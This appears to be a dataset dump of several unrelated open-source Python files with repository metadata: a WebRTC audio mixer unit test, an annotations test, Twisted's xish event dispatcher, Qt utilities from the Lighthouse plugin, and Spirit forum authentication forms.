/third_party/webrtc/modules/audio_processing/test/py_quality_assessment/quality_assessment/input_mixer_unittest.py
|
4fd5e4f1ee98d2de74a32e369cfd0e1335c0673d
|
[
"Apache-2.0",
"LGPL-2.0-or-later",
"MIT",
"GPL-1.0-or-later",
"BSD-3-Clause",
"LicenseRef-scancode-google-patent-license-webrtc",
"LicenseRef-scancode-google-patent-license-webm",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
iridium-browser/iridium-browser
|
71d9c5ff76e014e6900b825f67389ab0ccd01329
|
5ee297f53dc7f8e70183031cff62f37b0f19d25f
|
refs/heads/master
| 2023-08-03T16:44:16.844552
| 2023-07-20T15:17:00
| 2023-07-23T16:09:30
| 220,016,632
| 341
| 40
|
BSD-3-Clause
| 2021-08-13T13:54:45
| 2019-11-06T14:32:31
| null |
UTF-8
|
Python
| false
| false
| 5,929
|
py
|
input_mixer_unittest.py
|
# Copyright (c) 2017 The WebRTC project authors. All Rights Reserved.
#
# Use of this source code is governed by a BSD-style license
# that can be found in the LICENSE file in the root of the source
# tree. An additional intellectual property rights grant can be found
# in the file PATENTS. All contributing project authors may
# be found in the AUTHORS file in the root of the source tree.
"""Unit tests for the input mixer module.
"""
import logging
import os
import shutil
import tempfile
import unittest
import mock
from . import exceptions
from . import input_mixer
from . import signal_processing
class TestApmInputMixer(unittest.TestCase):
"""Unit tests for the ApmInputMixer class.
"""
# Audio track file names created in setUp().
_FILENAMES = ['capture', 'echo_1', 'echo_2', 'shorter', 'longer']
# Target peak power level (dBFS) of each audio track file created in setUp().
# These values are hand-crafted in order to make saturation happen when
# capture and echo_2 are mixed and the contrary for capture and echo_1.
# None means that the power is not changed.
_MAX_PEAK_POWER_LEVELS = [-10.0, -5.0, 0.0, None, None]
# Audio track file durations in milliseconds.
_DURATIONS = [1000, 1000, 1000, 800, 1200]
_SAMPLE_RATE = 48000
def setUp(self):
"""Creates temporary data."""
self._tmp_path = tempfile.mkdtemp()
# Create audio track files.
self._audio_tracks = {}
for filename, peak_power, duration in zip(self._FILENAMES,
self._MAX_PEAK_POWER_LEVELS,
self._DURATIONS):
audio_track_filepath = os.path.join(self._tmp_path,
'{}.wav'.format(filename))
# Create a pure tone with the target peak power level.
template = signal_processing.SignalProcessingUtils.GenerateSilence(
duration=duration, sample_rate=self._SAMPLE_RATE)
signal = signal_processing.SignalProcessingUtils.GeneratePureTone(
template)
if peak_power is not None:
signal = signal.apply_gain(-signal.max_dBFS + peak_power)
signal_processing.SignalProcessingUtils.SaveWav(
audio_track_filepath, signal)
self._audio_tracks[filename] = {
'filepath':
audio_track_filepath,
'num_samples':
signal_processing.SignalProcessingUtils.CountSamples(signal)
}
def tearDown(self):
"""Recursively deletes temporary folders."""
shutil.rmtree(self._tmp_path)
def testCheckMixSameDuration(self):
"""Checks the duration when mixing capture and echo with same duration."""
mix_filepath = input_mixer.ApmInputMixer.Mix(
self._tmp_path, self._audio_tracks['capture']['filepath'],
self._audio_tracks['echo_1']['filepath'])
self.assertTrue(os.path.exists(mix_filepath))
mix = signal_processing.SignalProcessingUtils.LoadWav(mix_filepath)
self.assertEqual(
self._audio_tracks['capture']['num_samples'],
signal_processing.SignalProcessingUtils.CountSamples(mix))
def testRejectShorterEcho(self):
"""Rejects echo signals that are shorter than the capture signal."""
try:
_ = input_mixer.ApmInputMixer.Mix(
self._tmp_path, self._audio_tracks['capture']['filepath'],
self._audio_tracks['shorter']['filepath'])
self.fail('no exception raised')
except exceptions.InputMixerException:
pass
def testCheckMixDurationWithLongerEcho(self):
"""Checks the duration when mixing an echo longer than the capture."""
mix_filepath = input_mixer.ApmInputMixer.Mix(
self._tmp_path, self._audio_tracks['capture']['filepath'],
self._audio_tracks['longer']['filepath'])
self.assertTrue(os.path.exists(mix_filepath))
mix = signal_processing.SignalProcessingUtils.LoadWav(mix_filepath)
self.assertEqual(
self._audio_tracks['capture']['num_samples'],
signal_processing.SignalProcessingUtils.CountSamples(mix))
def testCheckOutputFileNamesConflict(self):
"""Checks that different echo files lead to different output file names."""
mix1_filepath = input_mixer.ApmInputMixer.Mix(
self._tmp_path, self._audio_tracks['capture']['filepath'],
self._audio_tracks['echo_1']['filepath'])
self.assertTrue(os.path.exists(mix1_filepath))
mix2_filepath = input_mixer.ApmInputMixer.Mix(
self._tmp_path, self._audio_tracks['capture']['filepath'],
self._audio_tracks['echo_2']['filepath'])
self.assertTrue(os.path.exists(mix2_filepath))
self.assertNotEqual(mix1_filepath, mix2_filepath)
def testHardClippingLogExpected(self):
"""Checks that hard clipping warning is raised when occurring."""
logging.warning = mock.MagicMock(name='warning')
_ = input_mixer.ApmInputMixer.Mix(
self._tmp_path, self._audio_tracks['capture']['filepath'],
self._audio_tracks['echo_2']['filepath'])
logging.warning.assert_called_once_with(
input_mixer.ApmInputMixer.HardClippingLogMessage())
def testHardClippingLogNotExpected(self):
"""Checks that hard clipping warning is not raised when not occurring."""
logging.warning = mock.MagicMock(name='warning')
_ = input_mixer.ApmInputMixer.Mix(
self._tmp_path, self._audio_tracks['capture']['filepath'],
self._audio_tracks['echo_1']['filepath'])
self.assertNotIn(
mock.call(input_mixer.ApmInputMixer.HardClippingLogMessage()),
logging.warning.call_args_list)
|
d54fb226a9c8c5302112030f198c6976687c422a
|
73f69adf4e744751933725075c447e7d2d8df813
|
/book/src/ch01/src/test_annotations.py
|
41de784556e8878645c926fcd700de46824e250d
|
[
"MIT"
] |
permissive
|
rmariano/Clean-code-in-Python
|
5b6c89816e75ac18dfbbeb5210edb57cda9a910b
|
0cc2e3d79f996dfdda3dfbdf575cb3b9c492cefa
|
refs/heads/main
| 2023-08-17T09:23:45.471046
| 2023-08-15T18:18:01
| 2023-08-15T18:18:01
| 63,787,233
| 156
| 31
|
MIT
| 2023-09-11T11:32:05
| 2016-07-20T14:17:05
|
Python
|
UTF-8
|
Python
| false
| false
| 548
|
py
|
test_annotations.py
|
"""Clean Code in Python - Chapter 01: Introduction, Tools, and Formatting
Tests for annotations examples
"""
import pytest
from src.annotations import Point, locate
@pytest.mark.parametrize(
"defined_object,expected",
(
(locate, {"latitude": float, "longitude": float, "return": Point}),
(Point, {"lat": float, "long": float}),
),
)
def test_annotations(defined_object, expected):
"""test the class/functions against its expected annotations"""
assert getattr(defined_object, "__annotations__") == expected
|
ad2f97531a7990e90640ad489588e847478ed08f
|
3ef70fe63acaa665e2b163f30f1abd0a592231c1
|
/stackoverflow/venv/lib/python3.6/site-packages/twisted/words/xish/utility.py
|
6f8a11527daeabc0edd175e15e3b7d974c8482ea
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
wistbean/learn_python3_spider
|
14914b63691ac032955ba1adc29ad64976d80e15
|
40861791ec4ed3bbd14b07875af25cc740f76920
|
refs/heads/master
| 2023-08-16T05:42:27.208302
| 2023-03-30T17:03:58
| 2023-03-30T17:03:58
| 179,152,420
| 14,403
| 3,556
|
MIT
| 2022-05-20T14:08:34
| 2019-04-02T20:19:54
|
Python
|
UTF-8
|
Python
| false
| false
| 13,482
|
py
|
utility.py
|
# -*- test-case-name: twisted.words.test.test_xishutil -*-
#
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Event Dispatching and Callback utilities.
"""
from __future__ import absolute_import, division
from twisted.python import log
from twisted.python.compat import iteritems
from twisted.words.xish import xpath
class _MethodWrapper(object):
"""
Internal class for tracking method calls.
"""
def __init__(self, method, *args, **kwargs):
self.method = method
self.args = args
self.kwargs = kwargs
def __call__(self, *args, **kwargs):
nargs = self.args + args
nkwargs = self.kwargs.copy()
nkwargs.update(kwargs)
self.method(*nargs, **nkwargs)
class CallbackList:
"""
Container for callbacks.
Event queries are linked to lists of callables. When a matching event
occurs, these callables are called in sequence. One-time callbacks
are removed from the list after the first time the event was triggered.
Arguments to callbacks are split spread across two sets. The first set,
callback specific, is passed to C{addCallback} and is used for all
subsequent event triggers. The second set is passed to C{callback} and is
event specific. Positional arguments in the second set come after the
positional arguments of the first set. Keyword arguments in the second set
override those in the first set.
@ivar callbacks: The registered callbacks as mapping from the callable to a
tuple of a wrapper for that callable that keeps the
callback specific arguments and a boolean that signifies
if it is to be called only once.
@type callbacks: C{dict}
"""
def __init__(self):
self.callbacks = {}
def addCallback(self, onetime, method, *args, **kwargs):
"""
Add callback.
The arguments passed are used as callback specific arguments.
@param onetime: If C{True}, this callback is called at most once.
@type onetime: C{bool}
@param method: The callback callable to be added.
@param args: Positional arguments to the callable.
@type args: C{list}
@param kwargs: Keyword arguments to the callable.
@type kwargs: C{dict}
"""
if not method in self.callbacks:
self.callbacks[method] = (_MethodWrapper(method, *args, **kwargs),
onetime)
def removeCallback(self, method):
"""
Remove callback.
@param method: The callable to be removed.
"""
if method in self.callbacks:
del self.callbacks[method]
def callback(self, *args, **kwargs):
"""
Call all registered callbacks.
The passed arguments are event specific and augment and override
the callback specific arguments as described above.
@note: Exceptions raised by callbacks are trapped and logged. They will
not propagate up to make sure other callbacks will still be
called, and the event dispatching always succeeds.
@param args: Positional arguments to the callable.
@type args: C{list}
@param kwargs: Keyword arguments to the callable.
@type kwargs: C{dict}
"""
for key, (methodwrapper, onetime) in list(self.callbacks.items()):
try:
methodwrapper(*args, **kwargs)
except:
log.err()
if onetime:
del self.callbacks[key]
def isEmpty(self):
"""
Return if list of registered callbacks is empty.
@rtype: C{bool}
"""
return len(self.callbacks) == 0
class EventDispatcher:
"""
Event dispatching service.
The C{EventDispatcher} allows observers to be registered for certain events
that are dispatched. There are two types of events: XPath events and Named
events.
Every dispatch is triggered by calling L{dispatch} with a data object and,
for named events, the name of the event.
When an XPath type event is dispatched, the associated object is assumed to
be an L{Element<twisted.words.xish.domish.Element>} instance, which is
matched against all registered XPath queries. For every match, the
respective observer will be called with the data object.
A named event will simply call each registered observer for that particular
event name, with the data object. Unlike XPath type events, the data object
is not restricted to L{Element<twisted.words.xish.domish.Element>}, but can
be anything.
When registering observers, the event that is to be observed is specified
using an L{xpath.XPathQuery} instance or a string. In the latter case, the
string can also contain the string representation of an XPath expression.
To distinguish these from named events, each named event should start with
a special prefix that is stored in C{self.prefix}. It defaults to
C{//event/}.
Observers registered using L{addObserver} are persistent: after the
observer has been triggered by a dispatch, it remains registered for a
possible next dispatch. If instead L{addOnetimeObserver} was used to
observe an event, the observer is removed from the list of observers after
the first observed event.
Observers can also be prioritized, by providing an optional C{priority}
parameter to the L{addObserver} and L{addOnetimeObserver} methods. Higher
priority observers are then called before lower priority observers.
Finally, observers can be unregistered by using L{removeObserver}.
"""
def __init__(self, eventprefix="//event/"):
self.prefix = eventprefix
self._eventObservers = {}
self._xpathObservers = {}
self._dispatchDepth = 0 # Flag indicating levels of dispatching
# in progress
self._updateQueue = [] # Queued updates for observer ops
def _getEventAndObservers(self, event):
if isinstance(event, xpath.XPathQuery):
# Treat as xpath
observers = self._xpathObservers
else:
if self.prefix == event[:len(self.prefix)]:
# Treat as event
observers = self._eventObservers
else:
# Treat as xpath
event = xpath.internQuery(event)
observers = self._xpathObservers
return event, observers
def addOnetimeObserver(self, event, observerfn, priority=0, *args, **kwargs):
"""
Register a one-time observer for an event.
Like L{addObserver}, but is only triggered at most once. See there
for a description of the parameters.
"""
self._addObserver(True, event, observerfn, priority, *args, **kwargs)
def addObserver(self, event, observerfn, priority=0, *args, **kwargs):
"""
Register an observer for an event.
Each observer will be registered with a certain priority. Higher
priority observers get called before lower priority observers.
@param event: Name or XPath query for the event to be monitored.
@type event: C{str} or L{xpath.XPathQuery}.
@param observerfn: Function to be called when the specified event
has been triggered. This callable takes
one parameter: the data object that triggered
the event. When specified, the C{*args} and
C{**kwargs} parameters to addObserver are being used
as additional parameters to the registered observer
callable.
@param priority: (Optional) priority of this observer in relation to
other observer that match the same event. Defaults to
C{0}.
@type priority: C{int}
"""
self._addObserver(False, event, observerfn, priority, *args, **kwargs)
def _addObserver(self, onetime, event, observerfn, priority, *args, **kwargs):
# If this is happening in the middle of the dispatch, queue
# it up for processing after the dispatch completes
if self._dispatchDepth > 0:
self._updateQueue.append(lambda:self._addObserver(onetime, event, observerfn, priority, *args, **kwargs))
return
event, observers = self._getEventAndObservers(event)
if priority not in observers:
cbl = CallbackList()
observers[priority] = {event: cbl}
else:
priorityObservers = observers[priority]
if event not in priorityObservers:
cbl = CallbackList()
observers[priority][event] = cbl
else:
cbl = priorityObservers[event]
cbl.addCallback(onetime, observerfn, *args, **kwargs)
def removeObserver(self, event, observerfn):
"""
Remove callable as observer for an event.
The observer callable is removed for all priority levels for the
specified event.
@param event: Event for which the observer callable was registered.
@type event: C{str} or L{xpath.XPathQuery}
@param observerfn: Observer callable to be unregistered.
"""
# If this is happening in the middle of the dispatch, queue
# it up for processing after the dispatch completes
if self._dispatchDepth > 0:
self._updateQueue.append(lambda:self.removeObserver(event, observerfn))
return
event, observers = self._getEventAndObservers(event)
emptyLists = []
for priority, priorityObservers in iteritems(observers):
for query, callbacklist in iteritems(priorityObservers):
if event == query:
callbacklist.removeCallback(observerfn)
if callbacklist.isEmpty():
emptyLists.append((priority, query))
for priority, query in emptyLists:
del observers[priority][query]
def dispatch(self, obj, event=None):
"""
Dispatch an event.
When C{event} is L{None}, an XPath type event is triggered, and
C{obj} is assumed to be an instance of
L{Element<twisted.words.xish.domish.Element>}. Otherwise, C{event}
holds the name of the named event being triggered. In the latter case,
C{obj} can be anything.
@param obj: The object to be dispatched.
@param event: Optional event name.
@type event: C{str}
"""
foundTarget = False
self._dispatchDepth += 1
if event != None:
# Named event
observers = self._eventObservers
match = lambda query, obj: query == event
else:
# XPath event
observers = self._xpathObservers
match = lambda query, obj: query.matches(obj)
priorities = list(observers.keys())
priorities.sort()
priorities.reverse()
emptyLists = []
for priority in priorities:
for query, callbacklist in iteritems(observers[priority]):
if match(query, obj):
callbacklist.callback(obj)
foundTarget = True
if callbacklist.isEmpty():
emptyLists.append((priority, query))
for priority, query in emptyLists:
del observers[priority][query]
self._dispatchDepth -= 1
# If this is a dispatch within a dispatch, don't
# do anything with the updateQueue -- it needs to
# wait until we've back all the way out of the stack
if self._dispatchDepth == 0:
# Deal with pending update operations
for f in self._updateQueue:
f()
self._updateQueue = []
return foundTarget
class XmlPipe(object):
"""
XML stream pipe.
Connects two objects that communicate stanzas through an XML stream like
interface. Each of the ends of the pipe (sink and source) can be used to
send XML stanzas to the other side, or add observers to process XML stanzas
that were sent from the other side.
XML pipes are usually used in place of regular XML streams that are
transported over TCP. This is the reason for the use of the names source
and sink for both ends of the pipe. The source side corresponds with the
entity that initiated the TCP connection, whereas the sink corresponds with
the entity that accepts that connection. In this object, though, the source
and sink are treated equally.
Unlike Jabber
L{XmlStream<twisted.words.protocols.jabber.xmlstream.XmlStream>}s, the sink
and source objects are assumed to represent an eternal connected and
initialized XML stream. As such, events corresponding to connection,
disconnection, initialization and stream errors are not dispatched or
processed.
@since: 8.2
@ivar source: Source XML stream.
@ivar sink: Sink XML stream.
"""
def __init__(self):
self.source = EventDispatcher()
self.sink = EventDispatcher()
self.source.send = lambda obj: self.sink.dispatch(obj)
self.sink.send = lambda obj: self.source.dispatch(obj)
|
7a85c20e8ecaa672a52a9ad8f52f6efcd1112d96
|
79e8247110b113395f6ad935209c24b3d2590f24
|
/plugins/lighthouse/util/qt/util.py
|
0f7d337cf591b9a905d318abbfc7b58bf7782860
|
[
"MIT"
] |
permissive
|
gaasedelen/lighthouse
|
133a3fb019095c06d7432db2ac6a9dfb8be55ef7
|
f4642e8b4b4347b11ccb25a79ec4f490c9ad901d
|
refs/heads/develop
| 2023-07-19T21:13:47.247797
| 2022-02-17T07:59:38
| 2022-02-17T19:29:27
| 81,627,212
| 2,053
| 309
|
MIT
| 2023-05-14T00:11:52
| 2017-02-11T03:13:36
|
Python
|
UTF-8
|
Python
| false
| false
| 11,119
|
py
|
util.py
|
import sys
import time
import logging
import threading
from .shim import *
from ..misc import is_mainthread
from ..python import *
from ..disassembler import disassembler
logger = logging.getLogger("Lighthouse.Qt.Util")
#------------------------------------------------------------------------------
# Qt Fonts
#------------------------------------------------------------------------------
def MonospaceFont():
"""
Convenience alias for creating a monospace Qt font object.
"""
font = QtGui.QFont("Courier New")
font.setStyleHint(QtGui.QFont.Monospace)
return font
#------------------------------------------------------------------------------
# Qt Util
#------------------------------------------------------------------------------
def color_text(text, color):
"""
Return a colorized (HTML) version of the given string.
"""
return "<font color=\"%s\">%s</font>" % (color.name(), text)
def copy_to_clipboard(data):
"""
Copy the given data (a string) to the system clipboard.
"""
cb = QtWidgets.QApplication.clipboard()
cb.clear(mode=cb.Clipboard)
cb.setText(data, mode=cb.Clipboard)
def flush_qt_events():
"""
Flush the Qt event pipeline.
"""
app = QtCore.QCoreApplication.instance()
app.processEvents()
def get_qt_icon(name):
"""
Get a standard Qt icon by name.
"""
icon_type = getattr(QtWidgets.QStyle, name)
return QtWidgets.QApplication.style().standardIcon(icon_type)
def get_default_font_size():
"""
Get the default font size for this QApplication.
"""
return QtGui.QFont().pointSizeF()
def get_dpi_scale():
"""
Get a DPI-afflicted value useful for consistent UI scaling.
"""
font = MonospaceFont()
font.setPointSize(normalize_to_dpi(120))
fm = QtGui.QFontMetricsF(font)
# xHeight is expected to be 40.0 at normal DPI
return int(fm.height() / 173.0)
def compute_color_on_gradient(percent, color1, color2):
"""
Compute the color specified by a percent between two colors.
"""
r1, g1, b1, _ = color1.getRgb()
r2, g2, b2, _ = color2.getRgb()
# compute the new color across the gradient of color1 -> color 2
r = r1 + int(percent * (r2 - r1))
g = g1 + int(percent * (g2 - g1))
b = b1 + int(percent * (b2 - b1))
# return the new color
return QtGui.QColor(r,g,b)
def move_mouse_event(mouse_event, position):
"""
Move the given mouse event to a different position.
"""
new_event = QtGui.QMouseEvent(
mouse_event.type(),
position,
mouse_event.button(),
mouse_event.buttons(),
mouse_event.modifiers()
)
return new_event
def normalize_to_dpi(font_size):
"""
Normalize the given font size based on the system DPI.
"""
if sys.platform == "darwin": # macos is lame
return font_size + 2
return font_size
def prompt_string(label, title, default=""):
"""
Prompt the user with a dialog to enter a string.
This does not block the IDA main thread (unlike idaapi.askstr)
"""
dpi_scale = get_dpi_scale()
dlg = QtWidgets.QInputDialog(None)
dlg.setWindowFlags(dlg.windowFlags() & ~QtCore.Qt.WindowContextHelpButtonHint)
dlg.setInputMode(QtWidgets.QInputDialog.TextInput)
dlg.setLabelText(label)
dlg.setWindowTitle(title)
dlg.setTextValue(default)
dlg.resize(
dpi_scale*400,
dpi_scale*50
)
dlg.setModal(True)
dlg.show()
dlg.setFocus(QtCore.Qt.PopupFocusReason)
ok = dlg.exec_()
text = str(dlg.textValue())
return (ok, text)
def predict_bg_color(image):
"""
Predict the 'background color' of a given image.
This function takes an image, and analyzes its first row of pixels. It
will return the color that it believes to be the 'background color' based
on the longest sequence of identical pixels.
"""
assert image.width() and image.height()
# the details for the longest known color streak will be saved in these
longest = 1
speculative_bg = image.pixel(0, 0)
# this will be the computed length of the current color streak
sequence = 1
# find the longest streak of color in a single pixel slice
for x in xrange(1, image.width()):
# the color of this pixel matches the last pixel, extend the streak count
if image.pixel(x, 0) == image.pixel(x-1,0):
sequence += 1
#
# this catches the case where the longest color streak is in fact
# the last one. this ensures the streak color will get saved.
#
if x != image.width():
continue
# color change, determine if this was the longest continuous color streak
if sequence > longest:
# save the last pixel as the longest sequence / most likely BG color
longest = sequence
speculative_bg = image.pixel(x-1, 0)
# reset the sequence counter
sequence = 1
# return the color we speculate to be the background color
return speculative_bg
def remap_key_event(event, new_key):
"""
Change a given KeyPress QEvent to a different key.
"""
return QtGui.QKeyEvent(
QtCore.QEvent.KeyPress,
new_key,
event.modifiers(),
event.text(),
event.isAutoRepeat(),
event.count()
)
def singleshot(ms, function=None):
"""
A Qt Singleshot timer that can be stopped.
"""
timer = QtCore.QTimer()
timer.setInterval(ms)
timer.setSingleShot(True)
timer.timeout.connect(function)
return timer
#------------------------------------------------------------------------------
# Async Util
#------------------------------------------------------------------------------
def await_future(future):
"""
Wait for a queue (future) message without blocking the main (Qt) thread.
This is effectively a technique I use to get around completely blocking
IDA's mainthread while waiting for a threaded result that may need to make
use of the execute_sync operators.
Waiting for a 'future' thread result to come through via this function
lets other execute_sync actions to slip through (at least Read, Fast).
"""
interval = 0.02 # the interval which we wait for a response
# run until the message arrives through the future (a queue)
while True:
# block for a brief period to see if the future completes
try:
return future.get(timeout=interval)
#
# the future timed out, so perhaps it is blocked on a request
# to the mainthread. flush the requests now and try again
#
except queue.Empty as e:
pass
logger.debug("Awaiting future...")
#
# if we are executing (well, blocking) as the main thread, we need
# to flush the event loop so IDA does not hang
#
if QT_AVAILABLE and is_mainthread():
flush_qt_events()
def await_lock(lock):
"""
Wait for a lock without blocking the main (Qt) thread.
See await_future() for more details.
"""
elapsed = 0 # total time elapsed waiting for the lock
interval = 0.02 # the interval (in seconds) between acquire attempts
timeout = 60.0 # the total time allotted to acquiring the lock
end_time = time.time() + timeout
# wait until the lock is available
while time.time() < end_time:
#
# attempt to acquire the given lock without blocking (via 'False').
# if we successfully acquire the lock, then we can return (success)
#
if lock.acquire(False):
logger.debug("Acquired lock!")
return
#
# the lock is not available yet. we need to sleep so we don't choke
# the cpu, and try to acquire the lock again next time through...
#
logger.debug("Awaiting lock...")
time.sleep(interval)
#
# if we are executing (well, blocking) as the main thread, we need
# to flush the event loop so IDA does not hang
#
if QT_AVAILABLE and is_mainthread():
flush_qt_events()
#
# we spent 60 seconds trying to acquire the lock, but never got it...
# to avoid hanging IDA indefinitely (or worse), we abort via signal
#
raise RuntimeError("Failed to acquire lock after %f seconds!" % timeout)
class QMainthread(QtCore.QObject):
"""
A Qt object whose sole purpose is to execute code on the mainthread.
"""
toMainthread = QtCore.pyqtSignal(object)
toMainthreadFast = QtCore.pyqtSignal(object)
def __init__(self):
super(QMainthread, self).__init__()
# helpers used to ensure thread safety
self._lock = threading.Lock()
self._fast_refs = []
self._result_queue = queue.Queue()
# signals used to communicate with the Qt mainthread
self.toMainthread.connect(self._execute_with_result)
self.toMainthreadFast.connect(self._execute_fast)
#--------------------------------------------------------------------------
# Public
#--------------------------------------------------------------------------
def execute(self, function):
"""
Execute a function on the mainthread and wait for its return value.
This function is safe to call from any thread, at any time.
"""
# if we are already on the mainthread, execute the callable inline
if is_mainthread():
return function()
# execute the callable on the mainthread and wait for it to complete
with self._lock:
self.toMainthread.emit(function)
result = self._result_queue.get()
# return the result of executing on the mainthread
return result
def execute_fast(self, function):
"""
Execute a function on the mainthread without waiting for completion.
"""
#
# append the given function to a reference list.
#
# I do this because I am not confident python / qt will guarantee the
# lifetime of the callable (function) as we cross threads and the
# callee scope/callstack dissolves away from beneath us
#
# this callable will be deleted from the ref list in _excute_fast()
#
self._fast_refs.append(function)
# signal to the mainthread that a new function is ready to execute
self.toMainthreadFast.emit(function)
#--------------------------------------------------------------------------
# Internal
#--------------------------------------------------------------------------
def _execute_with_result(self, function):
try:
self._result_queue.put(function())
except Exception as e:
logger.exception("QMainthread Exception")
self._result_queue.put(None)
def _execute_fast(self, function):
function()
self._fast_refs.remove(function)
qt_mainthread = QMainthread()
|
1d4ee85a13c8b7aaf89b751f102f033647754a3d
|
c882c16e1c42974f2744a79738bde155acc985b6
|
/spirit/user/auth/forms.py
|
2c0d498c61c8102ab5bf56c22b633c60b71d5530
|
[
"MIT"
] |
permissive
|
nitely/Spirit
|
4e4f1615a990ec8174f71ab66c64de5c4e599107
|
9a304a57de021108d9225b87f35ad6395d5d56d3
|
refs/heads/master
| 2023-06-09T02:09:47.275554
| 2023-05-24T09:19:48
| 2023-05-24T09:19:48
| 19,626,318
| 1,049
| 391
|
MIT
| 2023-08-20T05:34:25
| 2014-05-09T21:31:33
|
Python
|
UTF-8
|
Python
| false
| false
| 5,181
|
py
|
forms.py
|
# -*- coding: utf-8 -*-
from django import forms
from django.contrib.auth import get_user_model
from django.contrib.auth.forms import AuthenticationForm, PasswordResetForm
from django.utils.translation import gettext_lazy as _
from django.template.loader import render_to_string
from spirit.core.conf import settings
from spirit.core import tasks
from spirit.user.forms import CleanEmailMixin
User = get_user_model()
class RegistrationForm(CleanEmailMixin, forms.ModelForm):
email2 = forms.CharField(
label=_("Email confirmation"),
widget=forms.EmailInput,
max_length=254,
help_text=_("Enter the same email as above, for verification."))
# todo: add password validator for Django 1.9
password = forms.CharField(
label=_("Password"),
widget=forms.PasswordInput)
honeypot = forms.CharField(
label=_("Leave blank"),
required=False)
class Meta:
model = User
fields = ("username", "email")
def __init__(self, *args, **kwargs):
super(RegistrationForm, self).__init__(*args, **kwargs)
self.fields['email'].required = True # Django model does not requires it
def clean_honeypot(self):
"""Check that nothing has been entered into the honeypot."""
value = self.cleaned_data["honeypot"]
if value:
raise forms.ValidationError(
_("Do not fill this field."))
return value
def clean_username(self):
username = self.cleaned_data["username"]
if settings.ST_CASE_INSENSITIVE_USERNAMES:
username = username.lower()
is_taken = (
User.objects
.filter(username=username)
.exists())
if is_taken:
raise forms.ValidationError(
_("The username is taken."))
return self.cleaned_data["username"]
def clean_email2(self):
email = self.cleaned_data.get("email")
email2 = self.cleaned_data["email2"]
if settings.ST_CASE_INSENSITIVE_EMAILS:
email2 = email2.lower()
if email and email != email2:
raise forms.ValidationError(
_("The two email fields didn't match."))
return email2
def save(self, commit=True):
self.instance.is_active = False
self.instance.set_password(self.cleaned_data["password"])
return super(RegistrationForm, self).save(commit)
class LoginForm(AuthenticationForm):
username = forms.CharField(
label=_("Username or Email"),
max_length=254)
def __init__(self, *args, **kwargs):
super(LoginForm, self).__init__(*args, **kwargs)
self.error_messages['invalid_login'] = _("The password is not valid.")
def _validate_username(self):
"""
Check the username exists.\
Show if the username or email is invalid\
instead of the unclear "username or\
password is invalid" message.
"""
username = self.cleaned_data.get("username")
if not username:
return
if settings.ST_CASE_INSENSITIVE_USERNAMES:
username = username.lower()
is_found = (
User.objects
.filter(username=username)
.exists())
if is_found:
return
if settings.ST_CASE_INSENSITIVE_EMAILS:
username = username.lower()
is_found_email = (
User.objects
.filter(email=username)
.exists())
if is_found_email:
return
raise forms.ValidationError(
_("No account matches %(username)s.") % {
'username': username})
def clean(self):
self._validate_username()
return super(LoginForm, self).clean()
class ResendActivationForm(forms.Form):
email = forms.CharField(
label=_("Email"),
widget=forms.EmailInput,
max_length=254)
def clean_email(self):
email = self.cleaned_data["email"]
if settings.ST_CASE_INSENSITIVE_EMAILS:
email = email.lower()
is_existent = (
User.objects
.filter(email=email)
.exists())
if not is_existent:
raise forms.ValidationError(
_("The provided email does not exists."))
self.user = (
User.objects
.filter(
email=email,
st__is_verified=False)
.order_by('-pk')
.first())
if not self.user:
raise forms.ValidationError(
_("This account is verified, try logging-in."))
return email
def get_user(self):
return self.user
class CustomPasswordResetForm(PasswordResetForm):
def send_mail(
self, subject_template_name, email_template_name,
context, from_email, to_email, html_email_template_name=None):
subject = render_to_string(subject_template_name, context)
subject = ''.join(subject.splitlines())
body = render_to_string(email_template_name, context)
tasks.send_email(subject, body, [to_email])
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.